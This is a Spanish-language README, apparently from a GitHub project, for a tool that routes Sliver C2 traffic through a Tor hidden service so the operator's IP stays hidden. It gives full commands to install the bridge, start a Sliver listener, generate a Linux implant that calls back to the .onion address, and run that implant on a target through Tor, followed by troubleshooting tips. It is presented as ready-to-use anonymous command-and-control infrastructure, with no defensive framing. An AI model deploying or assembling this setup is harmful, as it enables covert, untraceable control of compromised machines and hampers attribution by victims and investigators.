
Puente de transporte Tor para Sliver C2 - comando y control anónimo
puente de transporte basado en tor para sliver c2. crea un servicio oculto y redirige el tráfico a tu servidor sliver para que tu IP real nunca quede expuesta.
configura un servicio oculto de tor que apunta a un proxy http local. el proxy reenvía todo al listener https de sliver. los implants se conectan a través de tor, tú los controlas mediante sliver de forma normal.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
inicia sliver con un listener https:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
en otra terminal, inicia el puente:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
la salida mostrará algo como:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
espera la dirección .onion, luego genera un implant:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
ejecuta el implant en el objetivo (necesita tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port puerto https de sliver (por defecto 8443)
--tor-port puerto socks de tor (por defecto 9050)
--service-port puerto del servicio oculto (por defecto 80)
-c, --config ruta del archivo de configuración
otros comandos:
sliver-tor-bridge status # verificar si el servicio oculto está en ejecución
sliver-tor-bridge stop # limpiar el directorio del servicio oculto
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
el puente se sitúa en medio y retransmite el tráfico. sliver cree que recibe conexiones https normales. el implant cree que se comunica con un servidor http normal.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # interfaz de línea de comandos
tor_manager.py # inicia tor y crea el servicio oculto
proxy.py # aplicación flask que reenvía a sliver
config.py # manejo de configuración
tor no arranca: asegúrate de que el tor del sistema esté detenido (sudo systemctl stop tor)
tiempo de espera agotado: el bootstrap de tor puede tomar 1-3 minutos, espera al 100%
el implant no se conecta: asegúrate de que el implant tenga acceso a tor (proxy socks en 9050)
mit